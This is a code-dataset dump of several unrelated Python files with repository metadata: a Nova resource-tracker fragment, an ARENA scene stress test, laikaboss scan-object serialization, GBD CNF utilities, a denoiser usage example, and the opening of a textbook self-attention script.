usage[key] = updates[key]
return usage
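    # NOTE: _merge_provider_configs below layers operator-supplied provider
    # config files onto the provider tree reported by the virt driver. Only
    # *additional* traits and inventories may be supplied: attempting to
    # redefine a trait or inventory owned by the virt driver, or addressing
    # the same provider by both name and uuid from different config files,
    # raises ValueError.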
def _merge_provider_configs(self, provider_configs, provider_tree):
processed_providers = {}
provider_custom_traits = {}
for uuid_or_name, provider_data in provider_configs.items():
additional_traits = provider_data.get(
"traits", {}).get("additional", [])
additional_inventories = provider_data.get(
"inventories", {}).get("additional", [])
source_file_name = provider_data['__source_file']
providers_to_update = self._get_providers_to_update(
uuid_or_name, provider_tree, source_file_name)
for provider in providers_to_update:
if uuid_or_name == "$COMPUTE_NODE":
if any(_pid in provider_configs
for _pid in [provider.name, provider.uuid]):
continue
current_uuid = provider.uuid
if current_uuid in processed_providers:
raise ValueError(_(
"Provider config '%(source_file_name)s' conflicts "
"with provider config '%(processed_providers)s'. "
"The same provider is specified using both name "
"'%(uuid_or_name)s' and uuid '%(current_uuid)s'.") % {
'source_file_name': source_file_name,
'processed_providers':
processed_providers[current_uuid],
'uuid_or_name': uuid_or_name,
'current_uuid': current_uuid
}
)
if current_uuid not in provider_custom_traits:
provider_custom_traits[current_uuid] = {
trait for trait in provider.traits
if trait.startswith('CUSTOM')
}
existing_custom_traits = provider_custom_traits[current_uuid]
if additional_traits:
intersect = set(provider.traits) & set(additional_traits)
intersect -= existing_custom_traits
if intersect:
invalid = ','.join(intersect)
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define a trait that is owned by the "
"virt driver or specified via the placment api. "
"Invalid traits '%(invalid)s' must be removed "
"from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': invalid
}
)
provider_tree.add_traits(provider.uuid, *additional_traits)
if additional_inventories:
merged_inventory = provider.inventory
intersect = (merged_inventory.keys() &
{rc for inv_dict in additional_inventories
for rc in inv_dict})
if intersect:
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define an inventory that is owned by the "
"virt driver. Invalid inventories '%(invalid)s' "
"must be removed from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': ','.join(intersect)
}
)
for inventory in additional_inventories:
merged_inventory.update(inventory)
provider_tree.update_inventory(
provider.uuid, merged_inventory)
processed_providers[current_uuid] = source_file_name
def _get_providers_to_update(self, uuid_or_name, provider_tree,
source_file):
if uuid_or_name == "$COMPUTE_NODE":
return [root.data() for root in provider_tree.roots
if os_traits.COMPUTE_NODE in root.traits]
try:
providers_to_update = [provider_tree.data(uuid_or_name)]
self.absent_providers.discard(uuid_or_name)
except ValueError:
providers_to_update = []
if uuid_or_name not in self.absent_providers:
LOG.warning(
"Provider '%(uuid_or_name)s' specified in provider "
"config file '%(source_file)s' does not exist in the "
"ProviderTree and will be ignored.",
{"uuid_or_name": uuid_or_name,
"source_file": source_file})
self.absent_providers.add(uuid_or_name)
return providers_to_update
def build_failed(self, nodename):
self.stats[nodename].build_failed()
def build_succeeded(self, nodename):
self.stats[nodename].build_succeeded()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def claim_pci_devices(self, context, pci_requests, instance_numa_topology):
result = self.pci_tracker.claim_instance(
context, pci_requests, instance_numa_topology)
self.pci_tracker.save(context)
return result
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def unclaim_pci_devices(self, context, pci_device, instance):
self.pci_tracker.free_device(pci_device, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def allocate_pci_devices_for_instance(self, context, instance):
self.pci_tracker.allocate_instance(instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_allocations_for_instance(self, context, instance):
self.pci_tracker.free_instance_allocations(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_claims_for_instance(self, context, instance):
self.pci_tracker.free_instance_claims(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def finish_evacuation(self, instance, node, migration):
instance.apply_migration_context()
instance.host = self.host
instance.node = node
instance.save()
instance.drop_migration_context()
if migration:
migration.status = 'done'
migration.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def clean_compute_node_cache(self, compute_nodes_in_db):
compute_nodes_in_db_nodenames = {cn.hypervisor_hostname
for cn in compute_nodes_in_db}
stale_cns = set(self.compute_nodes) - compute_nodes_in_db_nodenames
for stale_cn in stale_cns:
self.remove_node(stale_cn)
self.reportclient.invalidate_resource_provider(stale_cn)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c492c4e9a84606e0f299dd1ac558d6f7ef71d04 | size: 2,113 | ext: py | lang: Python
path: system-tests/headbanger.py | repo: jameszha/ARENA-py @ 209d93e9b91ba1d0c306b307e6dcb8411aada5b3 | licenses: ["BSD-3-Clause"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
from arena import *
import random
import datetime
import time
scene = Scene(host="arenaxr.org", realm="realm", scene="headbanger")
# Create models
# How many heads?
heads=100
# Type of head: 0 = box, 1 = GLTF
head_type=1
headlist = []
cnt=0
for x in range(heads):
if head_type==1:
head = GLTF(
object_id="head"+str(cnt),
position=(random.random()*10, 1.5, random.random()*-10),
scale=(1, 1, 1),
url="https://www.dropbox.com/s/e28sgj44mwy0bbg/loomis-purple.glb?dl=0"
)
else:
head = Box(
object_id="head"+str(cnt),
position=(random.random()*10, 1.5, random.random()*-10),
scale=(.1, .1, .1),
)
headlist.append(head)
cnt=cnt+1
i=0
cnt=0
cycle=0
last = datetime.datetime.now()
@scene.run_once
def main():
print("Adding heads" )
for head in headlist:
scene.add_object(head)
@scene.run_forever(interval_ms=100)
def update():
global i, headlist, cnt, last,cycle
if cnt<100:
print("waiting...")
cnt=cnt+1
return
i=(i+15) % 360
for head in headlist:
if i==0:
head.data.position.y = cycle%3 + 1
if(cycle%3==0):
scene.update_object( head, rotation=(0, i, 0),color=(255, 0, 0))
if(cycle%3==1):
scene.update_object( head, rotation=(0, i, 0),color=(0, 255, 0))
if(cycle%3==2):
scene.update_object( head, rotation=(0, i, 0),color=(0, 0, 255))
else:
scene.update_object( head, rotation=(0, i, 0),color=(128, 128, 128))
if i==0:
if(cycle%3==0):
print("********************************** Red Low")
if(cycle%3==1):
print("********************************** Green Middle")
if(cycle%3==2):
print("********************************** Blue High")
cycle=cycle+1
cnt=cnt+1
now = datetime.datetime.now()
c = now-last
last=now
print("Heads: " + str(heads) + " Tick: " + str(cnt) + " Time: " + str(c.microseconds/1000) + "ms" )
scene.run_tasks()
avg_line_length: 25.768293 | max_line_length: 103 | alphanum_fraction: 0.515381
content_no_comment: verbatim duplicate of the source above with comments stripped (omitted)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c492ca7cd4baf1ea04cbb601645e54184e6e258 | size: 20,735 | ext: py | lang: Python
path: laikaboss/objectmodel.py | repo: sandialabs/laikaboss @ 3064ac1176911651d61c5176e9bd83eacec36b16 | licenses: ["Apache-2.0"]
max_stars_count: 2 (2019-11-02T23:40:23.000Z to 2019-12-01T22:24:57.000Z) | max_issues_count: null | max_forks_count: 3 (2017-08-09T23:58:40.000Z to 2019-12-01T22:25:06.000Z)
# Copyright 2015 Lockheed Martin Corporation
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Set up classes
from builtins import bytes
from builtins import str
from past.builtins import basestring
from builtins import object
from builtins import int
from laikaboss.constants import level_minimal, level_metadata
import logging
import base64
import time
import uuid
import json
# Metadata, etc. is always stored directly as unicode
def convertToUTF8(thing):
if isinstance(thing, bytes):
new_str = str(thing, "utf-8", errors="replace")
return new_str
elif isinstance(thing, str):
return str(thing)
elif isinstance(thing, (list, set, frozenset)):
new_obj = []
for o in thing:
new_obj.append(convertToUTF8(o))
return new_obj
elif isinstance(thing, tuple):
new_tuple = ()
for o in thing:
new_tuple += (convertToUTF8(o), )
return new_tuple
elif isinstance(thing, dict):
new_obj = {}
for key, value in thing.items():
new_key = cleanKey(key)
new_val = convertToUTF8(value)
new_obj[new_key] = new_val
return new_obj
elif isinstance(thing, bool):
return thing
elif isinstance(thing, (int, float, complex)):
if isinstance(thing, int) and type(thing) is not int:
return int(thing)
return thing
elif isinstance(thing, uuid.UUID):
return str(thing)
else:
return str(repr(thing))
# Utility function to (conditionally) convert a unicode buffer to UTF-8
# Note that str is a unicode type with "from builtins import str"
def ensureNotUnicode(buffer):
if isinstance(buffer, str):
return buffer.encode("utf-8")
else:
return buffer
# Utility function to make sure the buffer is a bytestring and not None
# (or whatever other weirdness comes through)
def ensureBytes(child_buffer):
# buffers and bytearrays can be cast to bytes
try:
if isinstance(child_buffer, memoryview) or isinstance(child_buffer, bytearray):
child_buffer = bytes(child_buffer)
except:
# Test cases do not produce any exceptions, but it's here just in case
raise Exception("Buffer of %s found, not creating child scanObject" % str(type(child_buffer)))
child_buffer = ensureNotUnicode(child_buffer)
# refuse to process anything else, as non-bytestring objects can crash the worker
if not isinstance(child_buffer, bytes):
raise Exception("Buffer of %s found, not creating child scanObject" % str(type(child_buffer)))
return child_buffer
def cleanKey(key):
bad_chars = ["\0", ".", "$"]
new_key = convertToUTF8(key)
if isinstance(new_key, str): # For now, allow keys to be booleans or integers
for c in bad_chars:
new_key = new_key.replace(c, "_")
return new_key
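# NOTE: "\0", "." and "$" are most likely replaced because they are not legal
# in field names of document stores such as MongoDB, a common backend for
# persisting scan results.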
class ScanError(RuntimeError):
"""Base error for any laika runtime errors"""
pass
class QuitScanException(ScanError):
"""Quit a scan prematurely"""
pass
class GlobalScanTimeoutError(ScanError):
"""Global timeout for an entire scan"""
pass
class GlobalModuleTimeoutError(ScanError):
"""Global timeout for any module within a scan"""
pass
class ScanObject(object):
def __init__(
self,
objectHash="",
contentType=[],
fileType=[],
buffer="",
objectSize=0,
filename="",
ephID="",
uniqID="",
parent="",
parent_order=-1,
sourceModule="",
source="",
depth=-1,
order=-1,
rootUID="",
origRootUID="",
charset="",
level=level_minimal,
uuid=str(uuid.uuid4()),
):
self.contentType = convertToUTF8(contentType)
self.fileType = fileType
self.scanModules = []
self.flags = []
self.objectHash = objectHash
self.buffer = ensureBytes(buffer)
self.objectSize = objectSize
self.filename = convertToUTF8(filename)
self.ephID = convertToUTF8(ephID)
self.uniqID = convertToUTF8(uniqID)
self.uuid = uuid
self.parent = parent
self.parent_order = parent_order
self.sourceModule = convertToUTF8(sourceModule)
self.source = convertToUTF8(source)
self.moduleMetadata = {}
self.level = level
self.depth = convertToUTF8(depth)
self.order = order
self.rootUID = ""
self.origRootUID = origRootUID
self.charset = charset
self.scanTime = int(time.time())
# Wrapper function to add flags to the object
def addFlag(self, flag):
flag = convertToUTF8(flag)
if flag not in self.flags:
self.flags.append(flag)
# Wrapper function for adding metadata to the object
def addMetadata(self, moduleName, key, value, unique=False, maxlen=0):
# Convert the value into UTF8, regardless of type (function will handle it)
value = convertToUTF8(value)
key = cleanKey(key)
if maxlen:
try:
if len(value) > maxlen:
logging.warn('truncating value of rootUID:%s uuid:%s filename:%s, module_name:%s key:%s ' % (self.rootUID, self.uuid, self.filename, moduleName, key))
value = (value[:maxlen] + '.._truncated')
except TypeError as e:
# it may be a type which doesn't support len
pass
# If no metadata exists for this module yet, add a new dictionary with the key/value pair
if moduleName not in self.moduleMetadata:
self.moduleMetadata[moduleName] = {key: value}
# If metadata already exists for this module, first check if the key exists
else:
# If the key doesn't already exist, add it to the dictionary
if key not in self.moduleMetadata[moduleName]:
if isinstance(value, list) and unique:
self.moduleMetadata[moduleName][key] = list(set(value))
else:
self.moduleMetadata[moduleName][key] = value
            # Otherwise, check to see if it's a list
else:
if type(self.moduleMetadata[moduleName][key]) is list:
# Check to see if it's in the list. If it is and unique is specified, don't add it
if isinstance(value, list):
if unique:
self.moduleMetadata[moduleName][key].extend([x for x in value if x not in self.moduleMetadata[moduleName][key]])
else:
self.moduleMetadata[moduleName][key].extend(value)
else:
if value not in self.moduleMetadata[moduleName][key] or not unique:
self.moduleMetadata[moduleName][key].append(value)
# If it's not a list, convert it to one.
else:
metalist = []
metalist.append(self.moduleMetadata[moduleName][key])
if isinstance(value, list):
if unique:
metalist.extend([x for x in list(set(value)) if x != self.moduleMetadata[moduleName][key]])
else:
metalist.extend(value)
else:
if value not in metalist or not unique:
metalist.append(value)
self.moduleMetadata[moduleName][key] = metalist
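    # Example with illustrative module/key names: repeated adds under the
    # same key coerce the stored value into a list, e.g.
    #   obj.addMetadata('EXPLODE_ZIP', 'filenames', 'a.txt')
    #   obj.addMetadata('EXPLODE_ZIP', 'filenames', 'b.txt', unique=True)
    #   obj.getMetadata('EXPLODE_ZIP', 'filenames')  # -> ['a.txt', 'b.txt']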
# Wrapper function for retrieving metadata from the object.
# If you don't specify a key this function returns a dictionary containing all metadata
# for the specified module.
def getMetadata(self, moduleName, key=None):
# Return a specific piece of metadata for a specific module
if key is not None:
if moduleName in self.moduleMetadata:
if key in self.moduleMetadata[moduleName]:
return self.moduleMetadata[moduleName][key]
else:
return ""
else:
return ""
# Return all metadata for a specific module
else:
if moduleName in self.moduleMetadata:
return self.moduleMetadata[moduleName]
else:
return {}
# This function is used for serializing ScanObjects
def serialize(self):
# If the return level is minimal, delete the buffer and metadata
if self.level == level_minimal:
odict = self.__dict__.copy()
del odict["buffer"]
del odict["moduleMetadata"]
# If the return level is metadata, delete the buffer
elif self.level == level_metadata:
odict = self.__dict__.copy()
del odict["buffer"]
else:
odict = self.__dict__
return odict
def __getstate__(self):
return self.serialize()
class ScanResult(object):
def __init__(self, source=None, level=None, rootUID=None, submitID=None):
self.files = {}
self.startTime = 0
self.disposition = ""
if source is not None:
self.source = source
else:
self.source = ""
if level is not None:
self.level = level
else:
self.level = level_minimal
if rootUID is not None:
self.rootUID = rootUID
else:
self.rootUID = ""
if submitID:
self.submitID = submitID
else:
self.submitID = ""
files = {}
startTime = 0
source = ""
level = ""
rootUID = ""
disposition = ""
submitID = ""
@staticmethod
def encode(scanresult):
d = {}
serialized_files = {}
for f in scanresult.files:
serialized_files[f] = scanresult.files[f].serialize()
d["files"] = serialized_files
d["startTime"] = scanresult.startTime
d["source"] = scanresult.source
d["level"] = scanresult.level
d["rootUID"] = scanresult.rootUID
d["disposition"] = scanresult.disposition
d["submitID"] = scanresult.submitID
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("serialization error:")
store_str = json.dumps(d, ensure_ascii=False)
if not isinstance(store_str, bytes):
store_str = store_str.encode("utf-8", errors="replace")
return store_str
@staticmethod
def decode(buf):
if not isinstance(buf, str):
buf = buf.decode("utf-8", errors="replace")
d = json.loads(buf)
result = ScanResult(source=d.get('source', ""), level=d.get('level', 0), rootUID=d.get('rootUID',""), submitID=d.get('submitID', ""))
result.startTime = d.get("startTime", 0)
result.files = d.get("files",{})
result.disposition = d.get("disposition",{})
return result
class SI_Object(object):
def __init__(self, buffer, externalVars):
self.buffer = ensureBytes(buffer)
self.externalVars = externalVars
buffer = ""
externalVars = None
class ModuleObject(SI_Object):
pass
class ExternalObject(SI_Object):
def __init__(self, buffer, externalVars, level=level_minimal):
self.level = level
if not isinstance(buffer, bytes):
buffer = buffer.encode("utf-8", errors="replace")
self.buffer = buffer
self.externalVars = externalVars
level = ""
@staticmethod
def encode(external_obj, ver=2):
d = {}
buf = external_obj.buffer
if not isinstance(buf, bytes):
buf = buf.encode("utf-8", errors="replace")
d["buffer"] = base64.standard_b64encode(buf)
d["level"] = external_obj.level
d["externalVars"] = external_obj.externalVars.encode(as_dict=True)
d["ver"] = ver
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("serialization error:")
store_str = json.dumps(d, ensure_ascii=False)
if not isinstance(store_str, bytes):
store_str = store_str.encode("utf-8", errors="replace")
return store_str
@staticmethod
def decode(encoded):
try:
d = json.loads(encoded)
except Exception as e:
logging.exception("decode error len= " + str(len(encoded)) + " encoded: '" + str(encoded[:100]) + "'")
raise e
# would we prefer unicode or utf-8 here? IDK
try:
d = convertToUTF8(d)
except Exception as e:
logging.exception("decode error convert to utf-8")
raise e
buf = base64.standard_b64decode(d["buffer"])
level = d.get("level", level_minimal)
ext_vars_dict = d.get("externalVars")
externalVars = ExternalVars(**ext_vars_dict)
return ExternalObject(buf, externalVars, level=level)
class ExternalVars(object):
def __init__(
self,
sourceModule="",
parentModules="",
contentType=[],
charset="",
filename="",
ephID="",
uniqID="",
timestamp="",
source="",
flags="",
parent="",
parent_order=-1,
depth=0,
origRootUID="",
comment="",
submitter="",
submitID="",
extArgs={},
extMetaData={},
**kwargs
):
self.sourceModule = sourceModule
self.parentModules = parentModules
self._contentType = []
self.set_contentType(contentType)
self.set_charset(charset)
self.set_filename(filename)
self.set_ephID(ephID)
self.set_uniqID(uniqID)
self.set_timestamp(timestamp)
self.set_source(source)
self.flags = flags
self.parent = parent
self.parent_order = parent_order
self.depth = depth
self.set_origRootUID(origRootUID)
self.set_extMetaData(extMetaData)
self.set_extArgs(extArgs)
self.set_submitter(submitter)
self.set_comment(comment)
self.set_submitID(submitID)
def encode(self, as_dict=False):
d = {
"sourceModule": self.sourceModule,
"parentModules": self.parentModules,
"contentType": self.get_contentType(),
"charset": self.get_charset(),
"filename": self.get_filename(),
"ephID": self.get_ephID(),
"uniqID": self.get_uniqID(),
"timestamp": self.get_timestamp(),
"source": self.get_source(),
"flags": self.flags,
"parent": self.parent,
"parent_order": self.parent_order,
"depth": self.depth,
"origRootUID": self.get_origRootUID(),
"comment": self.get_comment(),
"submitter": self.get_submitter(),
"submitID": self.get_submitID(),
"extArgs": self.get_extArgs(),
"extMetaData": self.get_extMetaData(),
}
if as_dict:
return d
store_str = json.dumps(d, ensure_ascii=False)
try:
submitID = d.get("submitID", "")
store_str = convertToUTF8(store_str)
except Exception as e:
logging.exception("serialization error error:" + submitID)
raise
return store_str
def get_contentType(self):
return self._contentType
def set_contentType(self, value):
self._contentType = []
if type(value) is list:
self._contentType.extend(convertToUTF8(value))
else:
self._contentType.append(convertToUTF8(value))
def get_charset(self):
return self._charset
def set_charset(self, value):
self._charset = convertToUTF8(value)
def get_filename(self):
return self._filename
def set_filename(self, filename):
self._filename = convertToUTF8(filename)
# Filenames must always be python native strings for compatibility
if not isinstance(self._filename, str):
self._filename = self._filename.encode("utf-8")
def get_ephID(self):
return self._ephID
def set_ephID(self, ephID):
self._ephID = convertToUTF8(ephID)
def get_uniqID(self):
return self._uniqID
def set_uniqID(self, uniqID):
self._uniqID = convertToUTF8(uniqID)
def get_timestamp(self):
return self._timestamp
def set_timestamp(self, timestamp):
self._timestamp = convertToUTF8(timestamp)
def get_source(self):
return self._source
def set_source(self, source):
self._source = convertToUTF8(source)
def get_origRootUID(self):
return self._origRootUID
def set_origRootUID(self, origRootUID):
self._origRootUID = convertToUTF8(origRootUID)
def get_extMetaData(self):
return self._extMetaData
def set_extMetaData(self, extMetaData):
try:
extMetaData = json.loads(extMetaData)
except ValueError:
pass
except TypeError:
pass
# in case someone sent an empty string or None
if not extMetaData:
            extMetaData = {}
self._extMetaData = convertToUTF8(extMetaData)
def set_comment(self, comment):
self._comment = convertToUTF8(comment)
self._setMetaItem("laikaboss_ext", "comment", self._comment)
def get_comment(self):
return self._comment
def set_submitter(self, submitter):
self._submitter = convertToUTF8(submitter)
self._setMetaItem("laikaboss_ext", "submitter", self._submitter)
def get_submitter(self):
return self._submitter
def set_submitID(self, submitID):
self._submitID = convertToUTF8(submitID)
self._setMetaItem("laikaboss_ext", "submitID", self._submitID)
def get_submitID(self):
return self._submitID
def set_extArgs(self, extArgs):
try:
            extArgs = json.loads(extArgs)
except ValueError:
pass
except TypeError:
pass
# in case someone sent an empty string or None
if not extArgs:
extArgs = {}
# put in a top level variable and in the extMetadata for now
self._extArgs = convertToUTF8(extArgs)
self._setMetaItem("args", value=self._extArgs)
def get_extArgs(self):
return self._extArgs
def _setMetaItem(self, key1, key2=None, value=None):
extMetaData = self._extMetaData
if key2:
m_ext = extMetaData.get(key1, {})
m_ext[key2] = value
extMetaData[key1] = m_ext
elif value:
try:
extMetaData[key1] = value
except Exception as e:
err = " raise: '" + str(extMetaData) + "'"
err += " type:" + str(type(extMetaData))
err += " e:" + str(e)
raise TypeError(err)
self._extMetaData = extMetaData
sourceModule = ""
parentModules = ""
_contentType = []
contentType = property(get_contentType, set_contentType)
charset = property(get_charset, set_charset)
filename = property(get_filename, set_filename)
ephID = property(get_ephID, set_ephID)
uniqID = property(get_uniqID, set_uniqID)
timestamp = property(get_timestamp, set_timestamp)
source = property(get_source, set_source)
flags = ""
parent = ""
depth = 0
rootUID = ""
origRootUID = property(get_origRootUID, set_origRootUID)
extMetaData = property(get_extMetaData, set_extMetaData)
submitID = property(get_submitID, set_submitID)
submitter = property(get_submitter, set_submitter)
comment = property(get_comment, set_comment)
extArgs = property(get_extArgs, set_extArgs)
avg_line_length: 31.22741 | max_line_length: 167 | alphanum_fraction: 0.599518
content_no_comment: verbatim duplicate of the source above with comments stripped (omitted)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c492d7823e57027410a6a13a82d1f14a113d5cc | size: 2,796 | ext: py | lang: Python
path: gbd_tool/util.py | repo: Weitspringer/gbd @ fed29b9f15167553e93af9a1a88aa6782c761e15 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: 1 (2019-03-11T17:34:27.000Z to 2019-03-11T17:34:27.000Z)
# Global Benchmark Database (GBD)
# Copyright (C) 2020 Markus Iser, Karlsruhe Institute of Technology (KIT)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import bz2
import gzip
import lzma
import io
__all__ = ['eprint', 'read_hashes', 'confirm', 'open_cnf_file', 'is_number']
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def open_cnf_file(filename, mode):
"""
Opens a CNF file (this is badly guarded, by file-extension only)
"""
obj = None
if filename.endswith('.cnf.gz'):
obj = gzip.open(filename, mode)
elif filename.endswith('.cnf.bz2'):
obj = bz2.open(filename, mode)
elif filename.endswith('.cnf.lzma') or filename.endswith('.cnf.xz'):
obj = lzma.open(filename, mode)
elif filename.endswith('.cnf'):
obj = open(filename, mode)
else:
raise Exception("Unknown File Extension. Use .cnf, .cnf.bz2, .cnf.lzma, .cnf.xz, or .cnf.gz")
if 'b' in mode:
return io.BufferedReader(obj, io.DEFAULT_BUFFER_SIZE * 8)
else:
return obj
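# Example usage with an illustrative file name: the same call transparently
# handles plain and compressed CNFs, e.g.
#   with open_cnf_file('benchmark.cnf.bz2', 'rb') as f:
#       header = f.readline()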
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def read_hashes():
eprint("Reading hashes from stdin ...")
hashes = list()
try:
while True:
line = sys.stdin.readline().split()
if len(line) == 0:
return hashes
hashes.extend(line)
except KeyboardInterrupt:
return hashes
return hashes
def confirm(prompt='Confirm', resp=False):
"""
    Prompts for a yes or no response from the user. Returns True for yes and False for no.
    'resp' should be set to the default value assumed by the caller when the user simply presses ENTER.
"""
if resp:
prompt = '%s [%s]|%s: ' % (prompt, 'y', 'n')
else:
prompt = '%s [%s]|%s: ' % (prompt, 'n', 'y')
while True:
ans = input(prompt)
if not ans:
return resp
if ans not in ['y', 'Y', 'n', 'N']:
print('please enter y or n.')
continue
if ans == 'y' or ans == 'Y':
return True
if ans == 'n' or ans == 'N':
return False
avg_line_length: 29.744681 | max_line_length: 101 | alphanum_fraction: 0.616595
content_no_comment: verbatim duplicate of the source above with comments stripped (omitted)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c492e2bffd7ccc7f803675a75443d0ae9f21d29 | size: 832 | ext: py | lang: Python
path: example_denoiser.py | repo: Jeffrey-Ede/Electron-Micrograph-Denoiser @ 23e4fa6a79540d9ce8e294d12623e972e3b9b584 | licenses: ["MIT"]
max_stars_count: 9 (2018-08-25T20:28:48.000Z to 2021-09-26T11:01:04.000Z) | max_issues_count: null | max_forks_count: 2 (2019-07-02T02:21:44.000Z to 2021-02-21T01:38:48.000Z)
import numpy as np
from denoiser import Denoiser, disp
#Create a 1500x1500 image from random numbers for demonstration
#Try replacing this with your own image!
img = np.random.rand(1500, 1500)
#Replace with the location of your saved checkpoint
checkpoint_loc = "//flexo.ads.warwick.ac.uk/Shared41/Microscopy/Jeffrey-Ede/models/denoiser-multi-gpu-13/model"
#Initialize the denoising neural network
noise_remover = Denoiser(checkpoint_loc=checkpoint_loc, visible_cuda="0")
#Denoise a 512x512 crop from the image
crop = img[:512,:512]
denoised_crop = noise_remover.denoise_crop(crop)
#Denoise the entire image
denoised_img = noise_remover.denoise(img)
disp(crop) #Crop before denoising
disp(denoised_crop) #Crop after denoising
disp(img) #Image before denoising
disp(denoised_img) #Image after denoising
avg_line_length: 33.28 | max_line_length: 112 | alphanum_fraction: 0.78125
content_no_comment: verbatim duplicate of the source above with comments stripped (omitted)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c492f160e5e930221c363008f27a84a830d7761 | size: 7,425 | ext: py | lang: Python
path: ch16/ch16-part1-self-attention.py | licenses: ["MIT"]
max_stars_repo: ericgarza70/machine-learning-book @ 073bebee7d4f7803cc4b7f790bd18d11cdb4c901 | max_stars_count: 655 (2021-12-19T00:33:00.000Z to 2022-03-31T16:30:36.000Z)
max_issues_repo: Topmost2020/machine-learning-book @ 40520104c3d76d75ce4aa785e59e8034f74bcc8e | max_issues_count: 41 (2022-01-14T14:22:02.000Z to 2022-03-31T16:26:09.000Z)
max_forks_repo: Topmost2020/machine-learning-book @ 40520104c3d76d75ce4aa785e59e8034f74bcc8e | max_forks_count: 180 (2021-12-20T07:05:42.000Z to 2022-03-31T07:38:20.000Z)
# coding: utf-8
import sys
from python_environment_check import check_packages
import torch
import torch.nn.functional as F
# # Machine Learning with PyTorch and Scikit-Learn
# # -- Code Examples
# ## Package version checks
# Add folder to path in order to load from the check_packages.py script:
sys.path.insert(0, '..')
# Check recommended package versions:
d = {
'torch': '1.9.0',
}
check_packages(d)
# # Chapter 16: Transformers – Improving Natural Language Processing with Attention Mechanisms (Part 1/3)
# **Outline**
#
# - [Adding an attention mechanism to RNNs](#Adding-an-attention-mechanism-to-RNNs)
# - [Attention helps RNNs with accessing information](#Attention-helps-RNNs-with-accessing-information)
# - [The original attention mechanism for RNNs](#The-original-attention-mechanism-for-RNNs)
# - [Processing the inputs using a bidirectional RNN](#Processing-the-inputs-using-a-bidirectional-RNN)
# - [Generating outputs from context vectors](#Generating-outputs-from-context-vectors)
# - [Computing the attention weights](#Computing-the-attention-weights)
# - [Introducing the self-attention mechanism](#Introducing-the-self-attention-mechanism)
# - [Starting with a basic form of self-attention](#Starting-with-a-basic-form-of-self-attention)
# - [Parameterizing the self-attention mechanism: scaled dot-product attention](#Parameterizing-the-self-attention-mechanism-scaled-dot-product-attention)
# - [Attention is all we need: introducing the original transformer architecture](#Attention-is-all-we-need-introducing-the-original-transformer-architecture)
# - [Encoding context embeddings via multi-head attention](#Encoding-context-embeddings-via-multi-head-attention)
# - [Learning a language model: decoder and masked multi-head attention](#Learning-a-language-model-decoder-and-masked-multi-head-attention)
# - [Implementation details: positional encodings and layer normalization](#Implementation-details-positional-encodings-and-layer-normalization)
# ## Adding an attention mechanism to RNNs
# ### Attention helps RNNs with accessing information
# ### The original attention mechanism for RNNs
# ### Processing the inputs using a bidirectional RNN
# ### Generating outputs from context vectors
# ### Computing the attention weights
# ## Introducing the self-attention mechanism
# ### Starting with a basic form of self-attention
# - Assume we have an input sentence that we encoded via a dictionary, which maps the words to integers as discussed in the RNN chapter:
# input sequence / sentence:
# "Can you help me to translate this sentence"
sentence = torch.tensor(
[0, # can
7, # you
1, # help
2, # me
5, # to
6, # translate
4, # this
3] # sentence
)
sentence
# - Next, assume we have an embedding of the words, i.e., the words are represented as real vectors.
# - Since we have 8 words, there will be 8 vectors. Each vector is 16-dimensional:
torch.manual_seed(123)
embed = torch.nn.Embedding(10, 16)
embedded_sentence = embed(sentence).detach()
embedded_sentence.shape
# - The goal is to compute the context vectors $\boldsymbol{z}^{(i)}=\sum_{j=1}^{T} \alpha_{i j} \boldsymbol{x}^{(j)}$, which involve attention weights $\alpha_{i j}$.
# - In turn, the attention weights $\alpha_{i j}$ involve the $\omega_{i j}$ values
# - Let's start with the $\omega_{i j}$'s first, which are computed as dot-products:
#
# $$\omega_{i j}=\boldsymbol{x}^{(i)^{\top}} \boldsymbol{x}^{(j)}$$
#
#
omega = torch.empty(8, 8)
for i, x_i in enumerate(embedded_sentence):
for j, x_j in enumerate(embedded_sentence):
omega[i, j] = torch.dot(x_i, x_j)
# - Actually, let's compute this more efficiently by replacing the nested for-loops with a matrix multiplication:
